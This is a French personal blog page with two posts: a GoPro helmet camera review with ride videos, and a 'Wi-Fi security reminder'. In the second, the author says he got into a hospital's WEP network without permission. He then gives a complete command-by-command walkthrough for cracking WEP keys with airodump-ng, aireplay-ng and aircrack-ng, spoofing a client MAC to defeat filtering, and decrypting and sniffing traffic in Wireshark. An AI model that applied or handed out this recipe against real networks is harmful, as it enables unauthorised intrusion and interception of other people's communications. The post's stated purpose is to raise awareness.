Skip to main content
KAIZER ONION

Month: July 2009

Be a Hero

Après mon séjour au Mondial du VTT aux 2 Alpes, je suis revenu avec une idée en tête : “Acheter une caméra embarquée”.
Désormais, c’est chose faite. Il s’agit de la caméra GoPro. Facile à  utiliser et à  fixer, voici dans les grandes lignes les qualités techniques de la bête :

  • Résolution: 5 megapixel (2592×1944) photo, 512×384 video
  • Format vidéo: MJPEG, 30 images/seconde
  • Optique: optique en verre, f/2.8 ouverture, avec un angle de vue de 170º
  • Modes: vidéo, standard photo, photo toute les 2 ou 5 secondes, 3 photos en 1 seconde en mode rafale, retardateur, possibilité d’inverser la prise de vue
  • Retardateur: 10 secondes
  • Micro: intégré mais pas terrible
  • Format audio: 8kHz, mono
  • Memoire: 16 MB interne, extensible à  4GB avec une SD (soit 110 minutes d’enregistrement)
  • Capacité: 56 minutes de vidéo ou 1,945 photos avec une SD de 2GB. Et 1h52min de vidéo avec une SD de 4GB.
  • Alimentation: 2x AAA batteries pour 3heures d’enregistrement avec des piles au lithium
  • Connexion TV (avec cabe RCA): NTSC ou PAL
  • Connexion PC: USB + RCA combo cable
  • Compatible avec: Windows ME, 2000, XP, et Vista; Mac OS X 10.2 et plus
  • Waterproof: jusqu’à  30 mètres
  • Dimensions: 4.45cm x 5.84cm x 3.18cm (H x L x P)
  • Poids: 139 g

Personnellement, je l’ai acheté sur eBay.com pour le prix de 148 euros TTC frais de port compris. Si vous êtes intéressé, le vendeur en a encore à  cette adresse.

GoPro Hero Wide
Le soir même de la reception du colis, je n’ai pu m’empêcher d’aller essayer mon nouveau joujou … Pour le coup, j’étais un peu trop préssé et le cadrage n’était pas au top mais cela m’a permit de visualiser la qualité de la caméra. Je vous laisse regarder cette petite vidéo en moto.

https://youtube.com/watch?v=hDuUb5Sgsao%26hl%3Dfr%26fs%3D1%26

Une fois testé sur la moto, il a fallu que je teste sur le vélo. Accompagné de Matt et Bruno pour un ride sans prise de tête. Je tiens à  préciser que vous allez voir mon premier passage sur le Road Gap de la descente d’Algrange. Pour les personnes qui ne connaissent pas, c’est un saut au dessus d’un passage de voiture.

https://youtube.com/watch?v=rAwPmGpSLpE%26hl%3Dfr%26fs%3D1%26

Et une voici la seconde vidéo, cette fois complète, de la descente d’Algrange.

https://youtube.com/watch?v=727m278pVq8%26hl%3Dfr%26fs%3D1%26

Si vous avez des remarques, n’hésitez pas.

Wifi / Hara-kiri (Seppuku)

Cette semaine j’ai été surpris d’apercevoir, dans un centre hospitalier, un spot wifi (professionnel) avec du WEP. Même si il y avait du filtrage par adresse mac et le service DHCP était coupé, cela m’a pris quelques minutes supplémentaires pour obtenir toutes les informations nécessaires à  la connexion de ce réseau… Alors je me suis dit qu’un petit rappel sur la sécurité des réseaux wifi pourrait être utile afin d’éviter l’hara-kiri.

Actuellement nous avons les différents types d’authentification suivants :

  • WEP Open ou Shared Key
  • WPA PSK avec encryption TKIP ou AES
  • WPA Enterprise avec encryption TKIP ou AES
  • WPA2 PSK avec encryption TKIP ou AES
  • WPA2 Enterprise avec encryption TKIP ou AES
  • 802.1x

Sur ces différents modes d’authentification, il y a bien entendu le WEP qui est complètement obsolète, et le protocole d’encryption TKIP qui contient des faiblesses découvertes par deux chercheurs allemands en novembre 2008.
Je ne vais pas refaire une biographie complète du WEP car il en existe déjà  beaucoup sur internet. Mais je vais vous montrer (à  nouveau car pour certain ce n’est pas clair visiblement) comment il est facile de casser une clé WEP.

Personnellement j’utilise le live CD backtrack 4 qui contient tous les outils nécessaires pour notre démo.

Pour la suite de la démonstration, on prendra pour acquis les éléments suivants :

  • MAC adresse du point d’accès cible : 00:CA:FE:BA:BE:FF
  • MAC adresse du client connecté sur le point d’accès : 00:BA:BE:CA:FE:FF
  • BSSID du point d’accès cible : POVWEP
  • Dans un premier temps, je mets ma carte wifi en mode monitor :

    airmon-ng start wlan0

    Puis je lance airodump-ng, il permet de scanner les réseaux wifi. Airodump-ng est simple d’utilisation.

    Usage: airodump-ng

    Airodump-ng offre une multitude d’options et de filtres afin de cibler ce que l’on souhaite surveiller.

    Options airodump-ng:

    -w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets.
    Exemple: airodump-ng -w out wlan0

    –encrypt permet de filtrer les réseaux en fonction du type d’encryption utilisé.
    Exemple: airodump-ng –encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)

    -c permet de cibler l’écoute sur un canal wifi particulier.
    Exemple: airodump-ng -c 10 wlan0 (airodump-ng n’écoutera que le canal 10)

    –bssid permet de ne cibler qu’un seul point d’accès en fonction de son adresse mac.
    Exemple: airodump-ng –bssid 00:CA:FE:BA:BE:FF wlan0 (airodump-ng ne surveillera que le point d’accès dont l’adresse mac est 00:CA:FE:BA:BE:3F)

    Donc si je veux faire un tour d’horizon ce que qui ce passe dans le coin, je lance :

    airodump-ng wlan0

    Je peux apercevoir que le point d’accès 00:CA:FE:BA:BE:FF a du WEP et un client connecté. Parfait, nous pouvons commencer. On lance un autre airodump qui va créer un fichier de capture. Ce fichier de capture sera utilisé par aireplay pour rejouer les ARP (injections de paquets).

    airodump-ng -w out -c 10 –bssid 00:CA:FE:BA:BE:FF wlan0

    Maintenant que nous sommes focalisé sur notre point d’accès et que nous avons un client connecté, nous pouvons tenter de nous associer au point d’accès avec aireplay :

    aireplay-ng

    Voici les différentes options de aireplay :

    –deauth count : deauthenticate 1 or all stations (-0)
    –fakeauth delay : fake authentication with AP (-1)
    –interactive : interactive frame selection (-2)
    –arpreplay : standard ARP-request replay (-3)
    –chopchop : decrypt/chopchop WEP packet (-4)
    –fragment : generates valid keystream (-5)
    –caffe-latte : query a client for new IVs (-6)
    –cfrag : fragments against a client (-7)
    –test : tests injection and quality (-9)

    On utilise l’option -1 fakeauth (association & authentification) pour notre test :

    aireplay-ng -1 0 -e POVWEP -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    wlan0: notre interface wifi

    Maintenant nous pouvons lancer notre attaque par rejeux d’ARP (injection de paquets). On utilise l’option -3 standard ARP-request replay (rejeu d’arp) :

    aireplay-ng -3 -e Livebox-a1b2 -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF -x 600 -r out-01.cap wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    600: nombre de paquets par secondes qui seront injectés (à  régler en fonction de la qualité du signal wifi)

    out-01.cap: notre fichier de capture airodump-ng

    wlan0: notre interface wifi

    Il ne reste plus qu’attendre afin d’obtenir 40000 ARP pour décrypter la clé WEP. Une fois vos 40000 ARP dans votre fichier de capture, il ne reste plus qu’à  décrypter la clé à  l’aide de aircrack.

    Aircrack-ng est très simple d’utilisation.

    usage: aircrack-ng [options] <.cap / .ivs file(s)>

    Dans notre cas, nous allons utiliser la commande suivante :

    aircrack-ng out-01.cap

    Quelques minutes après vous pourrez voir :

    KEY FOUND! [ FA:E6:18:26:27:56:B5:4D:C5:31:40:71:56 ]

    Maintenant si le réseau fait du filtrage par MAC adresse vous avez déjà  un mac adresse de disponible, utilisez là  :

    ifconfig wlan0 hw ether 00:BA:BE:CA:FE:FF

    Et si le service DHCP n’est pas activé, vous pouvez utiliser wireshark afin de définir l’adressage du réseau. Commencez par lancer wireshark.
    Puis configurer wireshark pour qu’il décrypte les paquets avec la clé WEP que vous venez juste de décrypter.

    Allez dans Edit\preferences\protocols\IEEE 802.11
    puis entrer la clé WEP
    Cochez Assume packets have FCS et enable decryption

    Screenshot-Wireshark: Preferences

    Vous pouvez commencer à  sniffer en allant dans capture\options

    Screenshot-Wireshark: Capture Options

    Si vous voulez être plus granulaire dans votre recherche vous pouvez faire un filtre sur votre point d’accès :

    (wlan.bssid==00:CA:FE:BA:BE:FF) && (tcp)

    Screenshot-The Wireshark Network Analyzer

    Vous allez découvrir des choses intéressantes.

    Deux formules à  retenir (dont une que j’empreinte à  sid) :

    WPA != PSK + TKIP
    WIFI != WEP